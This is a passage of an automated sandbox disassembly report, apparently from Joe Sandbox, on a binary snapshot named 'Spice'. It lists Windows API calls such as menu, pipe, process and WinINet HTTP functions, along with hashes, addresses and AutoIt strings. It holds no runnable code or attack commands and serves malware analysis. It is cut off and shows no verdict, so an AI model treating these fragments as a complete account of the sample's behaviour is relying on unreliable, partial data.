                                                                                                                                                                                                                                      • Instruction ID: 55d6cadef92d43dd07440eaaa3ae76cc0a3a798c243493f89bef0ba4c1598787
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f90bf435fb96d11ed5254d4c5eb9bb8c6e51c0933a3dc40ca6adb26d49611e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DE07576104509BBDB411FE5EC0CA5ABF79FF49722F504621F21991470CF72A461EB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EE8CFD
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00EE8E0C
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EE8F84
                                                                                                                                                                                                                                        • Part of subcall function 00ED7B1D: VariantInit.OLEAUT32(00000000), ref: 00ED7B5D
                                                                                                                                                                                                                                        • Part of subcall function 00ED7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00ED7B66
                                                                                                                                                                                                                                        • Part of subcall function 00ED7B1D: VariantClear.OLEAUT32(00000000), ref: 00ED7B72
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                                                                                                                                      • Opcode ID: 9162da07562d797e014c101e67eb31777ebac75a88dd57ad1a6c795ae0cd6c50
                                                                                                                                                                                                                                      • Instruction ID: 1fedefcbf6b830f669b0b5edc55929a0236a0591a0cc587189a06244583fbb22
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9162da07562d797e014c101e67eb31777ebac75a88dd57ad1a6c795ae0cd6c50
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0591AE70608345DFC710DF25C98095ABBF5EF89314F14996EF88AAB3A2DB31E905CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED332E
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED335D
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ED3410
                                                                                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ED343E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                                                                                                                                      • Opcode ID: f2ca5c8da58ce379a23bf81aa8d2974bd951c5868211441c95a3fa9eef50f2fc
                                                                                                                                                                                                                                      • Instruction ID: a895ec1c85b5121913fb057600c684baec90699b710190c561d4a788fa842981
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2ca5c8da58ce379a23bf81aa8d2974bd951c5868211441c95a3fa9eef50f2fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6951EF716083019EC725AB38D94566BB7E8EF45328F04262EF8A5B22A1DB74CA46C753
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED2F67
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ED2F83
                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00ED2FC9
                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F37890,00000000), ref: 00ED3012
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 4878172dc1c577dad73d82fd4125029872670c80e1b876953743f3cdcbc2c82d
                                                                                                                                                                                                                                      • Instruction ID: 4b7055ed4594822154b9d515f5dc7d8bf64ae0705eae19cc2ead237ee4d282d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4878172dc1c577dad73d82fd4125029872670c80e1b876953743f3cdcbc2c82d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C14180312083419FD720DF24C884B5ABBE8EF84314F145A1EF5A5B7391DB70EA06CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                        • Part of subcall function 00ECB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB7BD
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EC9ACC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EC9ADF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EC9B0F
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 365058703-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 4cd6178d02a1c1d70f239fed921e0dcdcb9fb31598993f569531dea333268e5e
                                                                                                                                                                                                                                      • Instruction ID: c95475b0428a7531ba008af050d42fb111bdedeba7abd88cb34b1640b5c0e4b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cd6178d02a1c1d70f239fed921e0dcdcb9fb31598993f569531dea333268e5e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB21E4719401047EDB18ABA0DC4AEFEB7ADEF41350F105259F829B72E1DF364D069720
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EE1F18
                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE1F3E
                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EE1F6E
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00EE1FB5
                                                                                                                                                                                                                                        • Part of subcall function 00EE2B4F: GetLastError.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B64
                                                                                                                                                                                                                                        • Part of subcall function 00EE2B4F: SetEvent.KERNEL32(?,?,00EE1EE3,00000000,00000000,00000001), ref: 00EE2B79
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 308b185bee3c98a93bb18c98d4191fbacbd77de0d987107d95d1329f94a4c198
                                                                                                                                                                                                                                      • Instruction ID: 278cec561a0d2d3abdb4df7d6b6e8ea222f372098295229afd1b8930b452510d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 308b185bee3c98a93bb18c98d4191fbacbd77de0d987107d95d1329f94a4c198
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B121BEB160424CBEEB119F618C85FBF77EDFF88748F10115AF505A6240EB349D449BA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: GetStockObject.GDI32(00000011), ref: 00E72163
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EF6A86
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00EF6A8D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EF6AA2
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00EF6AAA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                                                                                                                                      • Opcode ID: a2e1babe5e04201491c5b708b47de794c8b7046b20e847e3bfa7c8789504a9a8
                                                                                                                                                                                                                                      • Instruction ID: 5a9f564628abe0796ea924fdbdd11bd4b94cd1eb1d8667dbadc6e1af3cea9f13
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2e1babe5e04201491c5b708b47de794c8b7046b20e847e3bfa7c8789504a9a8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA219D71200A0DAFEF108FA4DC81EBB77ADEB59368F10A619FB50B2190D731DC51A760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00ED7377
                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED73AA
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00ED73BC
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00ED73F6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                                                                                      • Opcode ID: 579da28fb285244a66396afdee54d100256b18636b1503b75adb25b0d3353e0b
                                                                                                                                                                                                                                      • Instruction ID: 7bee24b9ece7fc0992bcb648a5fe9b7eebfb47b515b0d5f44430da1883cb73b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 579da28fb285244a66396afdee54d100256b18636b1503b75adb25b0d3353e0b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E321417150420AABDB209F65DC45A9E7BE4EF44724F205A1AFCE1E73D0E7709852EB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00ED7444
                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED7476
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00ED7487
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00ED74C1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                                                                                      • Opcode ID: 77cb14412f713afe4b89e5460edca9f59c2e2d584ac0122999acbe846f050b7d
                                                                                                                                                                                                                                      • Instruction ID: 29a0e550ee26a6dac065d3c1519a7ac8c4415bb959ba51d60a4e570689a85c3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77cb14412f713afe4b89e5460edca9f59c2e2d584ac0122999acbe846f050b7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4621B2715082069BDB219F689C45A9A7BE8EF45734F201B0AF9F0F73D0EB709842C750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EDB297
                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EDB2EB
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EDB304
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F00980), ref: 00EDB342
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                                                                                                                                      • Opcode ID: 49342a8efe6b32745da838bff4e9c4de4cc09ca34309b3c968b7d023085b4b18
                                                                                                                                                                                                                                      • Instruction ID: 09ba11348c91052d7b46ed4c006b7e47e5406310e3df2cb835bf855a870a1887
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49342a8efe6b32745da838bff4e9c4de4cc09ca34309b3c968b7d023085b4b18
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B213E74A00109AFCB10DF65C945EAEB7F8EF49704F108069F909E7392DB71EA46DB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                        • Part of subcall function 00ECAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECAA6F
                                                                                                                                                                                                                                        • Part of subcall function 00ECAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAA82
                                                                                                                                                                                                                                        • Part of subcall function 00ECAA52: GetCurrentThreadId.KERNEL32 ref: 00ECAA89
                                                                                                                                                                                                                                        • Part of subcall function 00ECAA52: AttachThreadInput.USER32(00000000), ref: 00ECAA90
                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00ECAC2A
                                                                                                                                                                                                                                        • Part of subcall function 00ECAA9B: GetParent.USER32(?), ref: 00ECAAA9
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ECAC73
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,00ECACEB), ref: 00ECAC9B
                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00ECACB5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                                                                      • API String ID: 1941087503-1110647743
                                                                                                                                                                                                                                      • Opcode ID: 7d572bf921ab88a2780fa8d07514aa555aa6cd98b6413a1df538fe9869371353
                                                                                                                                                                                                                                      • Instruction ID: 056f7ea8f30c1b92ace0b8e182ef50cdf590766ca5ed249a1e1a7d5ba13785ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d572bf921ab88a2780fa8d07514aa555aa6cd98b6413a1df538fe9869371353
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711D5746002086BDF11BFA0CE86FEA77ACAB44304F045079FD0CBA182DE7259469B72
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00ED2318
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                                                                      • API String ID: 3964851224-769500911
                                                                                                                                                                                                                                      • Opcode ID: a736cbe1ffc39cc7c783373625e7ed826c2e87bafbb654ff081af9f95a6e20a1
                                                                                                                                                                                                                                      • Instruction ID: 29af1643f381fbb344c9f57a77ebd412379c648cd7b583ce300cc7270095a5a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a736cbe1ffc39cc7c783373625e7ed826c2e87bafbb654ff081af9f95a6e20a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B115E30900129DFCF04EF94D9514EEB7B8FF25344B5054A9D91477352EB365D16DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EEF2F0
                                                                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EEF320
                                                                                                                                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EEF453
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EEF4D4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
